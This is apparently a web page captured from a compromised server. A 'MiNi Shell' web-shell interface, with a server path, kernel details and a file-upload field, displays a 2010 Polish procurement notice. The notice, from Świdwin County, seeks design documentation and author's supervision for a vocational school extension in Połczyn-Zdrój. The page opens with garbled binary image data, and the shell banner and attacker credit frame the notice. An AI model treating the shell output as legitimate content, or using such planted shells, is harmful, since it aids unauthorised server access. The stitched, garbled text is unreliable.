JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100222/36097-N-2010.html

<p class="kh_header"><b>Świdwin: Wykonanie dokumentacji projektowej i świadczenie usługi nadzoru autorskiego dla inwestycji - Rozbudowa budynku szkoły  z przeznaczeniem na zajęcia praktyczne szkolnictwa zawodowego</b><br>
<b>Numer ogłoszenia: 36097 - 2010; data zamieszczenia: 22.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej i świadczenie usługi nadzoru autorskiego dla inwestycji - Rozbudowa budynku szkoły  z przeznaczeniem na zajęcia praktyczne szkolnictwa zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Tytuł zadania: Wykonanie dokumentacji projektowej i świadczenie usługi nadzoru autorskiego dla inwestycji - Rozbudowa budynku szkoły z przeznaczeniem na zajęcia praktyczne szkolnictwa zawodowego.
Adres inwestycji: 
Zespół Szkół Ponadgimnazjalnych, ul. Staszica 6, 78-320 Połczyn-Zdrój, dz. nr 184/2
C1. WYMAGANIA OGÓLNE

1.	Usługi projektowania obejmują:
a)	uzyskanie niezbędnych materiałów do przeprowadzenia prac projektowych;
b)	wykonanie przez Wykonawcę dokumentacji projektowej (projekt budowlany, projekt wykonawczy, przedmiar robót) kosztorysów inwestorskich i specyfikacji technicznych wykonania i odbioru robót budowlanych w formie papierowej oraz w formie elektronicznej.

2.	Wykonawca zobowiązany będzie do:
a)	świadczenia Usług z należytą starannością, zgodnie z najlepszymi praktykami stosowanymi przy projektowaniu;
b)	zapewnienie kompetentnego personelu do realizacji zamówienia, który będzie współpracował z osobami wskazanymi przez Zamawiającego, w tym kierownika projektu po stronie Wykonawcy odpowiedzialnego za realizację Usługi;
c)	wykonywanie czynności, o których mowa w art. 20 ust. 1 pkt. 1-3  - ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (j.t: Dz.U. z 2006 r. Nr 156, poz. 1118 z póź.zm)
d)	uzgodnienia harmonogramu prac z Zamawiającym;
e)	wykonanie dokumentacji projektowej wg koncepcji opracowanej w grudniu 2009 r. przez MG Projekt Marek Gluba
f)	pełnienie nadzoru autorskiego (wg potrzeb Zamawiającego)
- orientacyjnie jedna wizyta w miesiącu na placu budowy, w terminie wskazanym przez Zamawiającego,
- wykonywanie czynności, o których mowa w art. 20 ust. 1 pkt. 4  - ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (j.t: Dz.U. z 2006 r. Nr 156, poz. 1118 z póź.zm.), 
- udzielania wyjaśnień odnośnie rozwiązań projektowych i dokonywanie niezbędnych poprawek wynikających z błędów projektowych i kosztorysowych w terminach umożliwiających Zamawiającemu sprawne przeprowadzenie postępowania o udzielenie zamówienia publicznego na zaprojektowane roboty budowlane, 
- udzielanie odpowiedzi na pytania Zamawiającego lub wykonawcy robót budowlanych w trakcie realizacji inwestycji,
- opracowanie rysunków zamiennych i rysunków szczegółowych rozwiązań technicznych nie ujętych w projekcie.


C2. RAMOWY PROGRAM UŻYTKOWO - FUNKCJONALNY 


Przedmiotem programu użytkowo - funkcjonalnego jest rozbudowa istniejącego budynku Zespołu Szkół Ponadgimnazjalnych, o blok z przeznaczeniem na zajęcia praktyczne szkolnictwa zawodowego. W planowanej części budynku znajdą się pomieszczenia ogólno dydaktyczne oraz do ćwiczeń praktycznych, przeznaczone do nauki zawodu w specjalności technik hotelarstwa  oraz kucharz. Ponadto planuje się budowę zjazdu ( w miejscu zjazdu istniejącego), utwardzeń terenu (w postaci drogi doprowadzającej do budynku mieszkalnego nauczycieli), w tym niewielkiego parkingu, z kostki betonowej.
Dla lokalizacji budynku niezbędne będzie usunięcie kolizji z istniejącymi na terenie działki sieciami. 
Na terenie inwestycji planuje się również oświetlenie zewnętrzne terenu.

Projekt budynku należy wykonać wg koncepcji opracowanej przez mgr inż. arch. Aleksandrę Kinowską oraz mgr inż. Marka Glubę (Załącznik nr 5 do SIWZ). Z zastrzeżeniem zmian wprowadzonych przez opis przedmiotu zamówienia zawarty w niniejszej SIWZ.

Wspólny Słownik Zamówień
71220000-6 Usługi projektowania architektonicznego

C3. ZAKRES OPRACOWANIA DOKUMENTACJI PROJEKTOWEJ

Zakres dokumentacji, o którym mowa poniżej zostanie sporządzony szczególności w oparciu o :
1.	Ustawę z dnia 7 lipca 1994 r. - Prawo budowlane (j.t. Dz.U. z 2006 r., Nr 156, poz. 1118 z póź. zm.)
2.	Rozporządzenie Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego
3.	Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego: (Dz. U. Nr 202, poz. 2072 z póź, zm.).
4.	Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym. (Dz. U. Nr 130, poz. 1389)

Ilekroć w niniejszej specyfikacji istotnych warunków zamówienia jest mowa o:
a)	kosztorysie inwestorskim należy przez to rozumieć kosztorys sporządzony zgodnie z wymogami rozporządzenia, o którym mowa w pkt. 4,
b)	przedmiarze robót należy przez to rozumieć przedmiar sporządzony zgodnie z wymogami rozporządzenia, o którym mowa w pkt. 3,
c)	projekcie budowlanym należy przez to rozumieć projekt budowlany sporządzony zgodnie z wymogami ustawy, o której mowa w pkt. 1 i rozporządzenia o którym mowa w pkt. 2, zawierającym wszystkie opinie i uzgodnienia niezbędne do uzyskania decyzji o pozwoleniu na budowę,
d)	projekcie wykonawczym należy przez to rozumieć projekt wykonawczy sporządzony zgodnie z wymogami rozporządzenia, o którym mowa w pkt. 3,
e)	specyfikacjach technicznych wykonania i odbioru robót budowlanych należy przez to rozumieć specyfikacje techniczne wykonania i odbioru robót budowlanych sporządzone zgodnie z wymogami rozporządzenia, o którym mowa w pkt. 3.


I.	Zakres rzeczowy dokumentacji obejmował będzie następujące opracowania

1.	Branża architektoniczno-konstrukcyjna
a)	Kosztorys inwestorski - 2 egz.
b)	Przedmiar robót   - 2 egz.
c)	Projekt zagospodarowania terenu dla budynku szkoły - 5 egz.
d)	Projekt budowlany elewacji - wraz z ociepleniem i kolorystyką budynku - 5 egz.
e)	Projekt konstrukcyjno- budowlany szkoły - 5 egz.
f)	Specyfikacje techniczne wykonania i odbioru robót budowlanych dla branży architektoniczno- konstrukcyjnej - 2 egz. 
g)	Projekty wykonawcze dla zakresu wymienionego powyżej - 3 egz.

2.	Branża sanitarna
a)	Kosztorys inwestorski - 2 egz.
b)	Przedmiar robót   - 2 egz.
c)	Projekt budowlany przyłącza wodociągowego, kanalizacji sanitarnej i
deszczowej - 5 egz.
d)	Projekt budowlany instalacji kolektorów słonecznych na potrzeby grzania cieplej wody użytkowej. - 5 egz)
e)	Projekt budowlany instalacji C.O. - 5 egz.
f)	Projekt budowlany instalacji gazowej - 5 egz.
g)	Projekt budowlany instalacji wodno-kanalizacyjnej - 5 egz.
h)	Projekt budowlany instalacji wentylacji (instalacja z odzyskiem ciepła ) - 5 egz.
i)	Specyfikacja techniczna wykonania i odbioru robót budowlanych dla branży sanitarnej - 2 egz.
j)	Projekt budowlany węzła cieplnego wraz z obliczeniem zapotrzebowania na ciepło starego budynku i części rozbudowywanej   - 5 egz.
k)	Projekty wykonawcze dla zakresu wymienionego powyżej - 3 egz.


3.	Branża elektryczna
a)	Kosztorys inwestorski - 2 egz.
b)	Przedmiar robót - 2 egz.
c)	Projekt budowlany instalacji odgromowej - 5 egz.
d)	Projekt budowlany instalacji elektrycznej i oświetleniowej - 5 egz.
e)	Projekt budowlany instalacji elektrycznej do zasilania sieci komputerowej i instalacji komputerowej  (wraz z wyceną wyposażenia serwerowni)- 5 egz.
f)	Projekt budowlany instalacji telefonicznej i alarmowej (wraz z wyceną urządzeń końcowych)  - 5 egz.
g)	Specyfikacje techniczne wykonania i odbioru robót budowlanych dla branży sanitarnej - 2 egz.
h)	Projekty wykonawcze dla zakresu wymienionego powyżej - 3 egz.

4.	Branża drogowa

a)	kosztorys inwestorski, - 2 egz.
b)	przedmiar robót - 2 egz.
c)	projekt budowlany dróg dojazdowych - ewakuacyjnych, chodników - 5 egz.
d)	specyfikacje techniczne wykonania i odbioru robót budowlanych dla branży drogowej - 2 egz.
e)	projekty wykonawcze dla zakresu wymienionego powyżej - 3 egz.


II.	Dodatkowa dokumentacja
1.	Wykonawca zleci lub wykona dokumentację geotechniczną pod potrzeby realizacji projektu.
2.	Wykonawca przekaże całość dokumentacji również w formie elektronicznej:
a)	rysunki w formacie pdf  i dwg,
b)	część opisowa w formacie doc. i pdf,
c)	kosztorysy i przedmiary w formacie pdf  i ath,
d)	dokumenty zewnętrzne w formie skanów w formacie pdf, 
Pliki muszą być opisane w sposób umożliwiający ich łatwą identyfikację i powiązanie z wersją papierową dokumentacji projektowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy:

1.	Dysponują osobami zdolnymi do wykonania zamówienia wg  poniższych wymagań :
a)	Projektant posiadający uprawnienia budowlane w branży architektonicznej, który projektował minimum 1 budynek szkoły o powierzchni nie mniejszej niż 800 m2 - min. 2 osoby, (projektant + sprawdzający)
b)	Projektant posiadający uprawnienia budowlane w branży konstrukcyjno-budowlanej który projektował minimum 1 budynek szkoły o powierzchni nie mniejszej niż 800 m2 - min. 2 osoby, (projektant + sprawdzający)
c)	Projektant posiadający uprawnienia budowlane w branży sanitarnej, który projektował minimum 1 instalację wentylacji z odzyskiem ciepła, minimum 1 instalację kolektorów słonecznych oraz minimum 1 projekt węzła cieplnego - min. 2 osoby (projektant + sprawdzający)
d)	Projektant posiadający uprawnienia budowlane w branży elektrycznej który projektował minimum 1 instalację elektryczną w budynku szkoły i 1 instalację elektryczną do zasilania komputerów, - min. 2 osoby (projektant + sprawdzający)
e)	Osoba , która wykonała minimum 1 projekt instalacji komputerowej, telefonicznej, alarmowej, detekcji pożaru i monitoringu  (wraz z urządzeniami końcowymi). - min. 1 osoba,
f)	Projektant posiadający uprawnienia w branży drogowej, który wykonał minimum 1 projekt utwardzenia terenu - min. 1 osoba
g)	Kosztorysant posiadający minimum 5 letnie doświadczenie w wykonywaniu kosztorysów budowlanych, który wykonał minimum 1 kosztorys budowy budynku szkoły wraz instalacjami wewnętrznymi, 1 kosztorys instalacji wentylacji z odzyskiem ciepła, minimum 1 kosztorys instalacji kolektorów - min 1 osoba

Zamawiający oceni spełnienie tego warunku na podstawie wypełnionego wykazu osób stanowiącego załącznik nr 4.

Opracowania, których wykonanie potwierdza posiadanie, przez osoby wymienione w pkt. E.1, doświadczenia niezbędnego do wykonania przedmiotu zamówienia, to wykonane w ostatnich 10 latach opracowania na podstawie, których zrealizowano lub realizuje się roboty budowlane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy:
2.	Legitymują się ubezpieczeniem odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej w wysokości min. 50 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokumenty (referencje, protokoły odbioru lub inne dokumenty potwierdzające, że osoby przedstawione w wykazie osób opracowywały dokumentację o zakresach wymienionych w pkt. III.3.4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana niniejszej umowy jest dopuszczalna jedynie w przypadku, gdy:
1.	Badania geotechniczne wykażą, że wykonanie posadowienia budynków generuje koszty niewspółmierne do kosztu prac kubaturowych - Zamawiający może odstąpić od umowy, dokonując zapłaty jedynie za wykonany zakres prac, tj. za badanie geotechniczne
2.           Wypadek losowy spowoduje, niezdolność do wykonywania prac projektowych projektanta będącego członkiem zespołu przez okres dłuższy niż 30 dni - potwierdzone  zwolnieniem lekarskim - Wykonawca będzie mógł zwrócić się z wnioskiem o przedłużenie terminu wykonania zakresu należącego do tego projektanta, o czas w jakim był niezdolny do wykonywania prac.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Świdwinie
ul. Mieszka I 16
78-300 Świdwin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 10:00, miejsce: Starostwo Powiatowe w Świdwinie
ul. Mieszka I 16
78-300 Świdwin
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com